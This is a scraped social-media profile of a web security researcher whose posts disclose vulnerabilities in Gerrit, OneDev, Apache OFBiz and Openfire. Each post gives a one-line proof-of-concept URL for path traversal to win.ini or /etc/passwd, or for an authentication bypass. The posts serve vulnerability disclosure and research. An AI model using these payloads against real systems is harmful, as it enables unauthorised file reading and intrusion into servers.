Siebene7's profile picture. ⚸ Security Researcher ⚸ CTF:( Web @Nu1L_Team ) ⚸ http://siebene.github.io ⚸

Siebene@

@Siebene7

⚸ Security Researcher ⚸ CTF:( Web @Nu1L_Team ) ⚸ http://siebene.github.io ⚸

Gerrit 3.12.0 has an Arbitrary File Read vulnerability on Windows #POC: http://ip:port/static/C:/Windows/win.ini I reported this vulnerability to the official team on July 10, 2024, and it appears it hasn't been fixed in the past year.

Siebene7's tweet image. Gerrit 3.12.0 has an Arbitrary File Read vulnerability on Windows

#POC:
http://ip:port/static/C:/Windows/win.ini

I reported this vulnerability to the official team on July 10, 2024, and it appears it hasn't been fixed in the past year.
Siebene7's tweet image. Gerrit 3.12.0 has an Arbitrary File Read vulnerability on Windows

#POC:
http://ip:port/static/C:/Windows/win.ini

I reported this vulnerability to the official team on July 10, 2024, and it appears it hasn't been fixed in the past year.
Siebene7's tweet image. Gerrit 3.12.0 has an Arbitrary File Read vulnerability on Windows

#POC:
http://ip:port/static/C:/Windows/win.ini

I reported this vulnerability to the official team on July 10, 2024, and it appears it hasn't been fixed in the past year.

#CVE-2024-45309 Exposing Sensitive Data #POC: Assume there is a project named test. http://ip:port/test/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd Ref: github.com/theonedev/oned…


#CVE-2023-49070 Pre-auth RCE Apache Ofbiz 18.12.09 #POC: /webtools/control/xmlrpc;/?USERNAME=&PASSWORD=s&requirePasswordChange=Y Ref: seclists.org/oss-sec/2023/q… cc to me.


Performing real-time tainted analysis while executing, still in the process of development.

Siebene7's tweet image. Performing real-time tainted analysis while executing, still in the process of development.
Siebene7's tweet image. Performing real-time tainted analysis while executing, still in the process of development.
Siebene7's tweet image. Performing real-time tainted analysis while executing, still in the process of development.

Siebene@ reposted

#CVE-2023-32315 Openfire Admin Console Auth Bypass #POC: /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp Ref: github.com/advisories/GHS… Credit to @Siebene7

_0xf4n9x_'s tweet image. #CVE-2023-32315 Openfire Admin Console Auth Bypass

#POC: 
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

Ref: github.com/advisories/GHS…

Credit to @Siebene7
_0xf4n9x_'s tweet image. #CVE-2023-32315 Openfire Admin Console Auth Bypass

#POC: 
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

Ref: github.com/advisories/GHS…

Credit to @Siebene7
_0xf4n9x_'s tweet image. #CVE-2023-32315 Openfire Admin Console Auth Bypass

#POC: 
/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

Ref: github.com/advisories/GHS…

Credit to @Siebene7

Loading...

Something went wrong.


Something went wrong.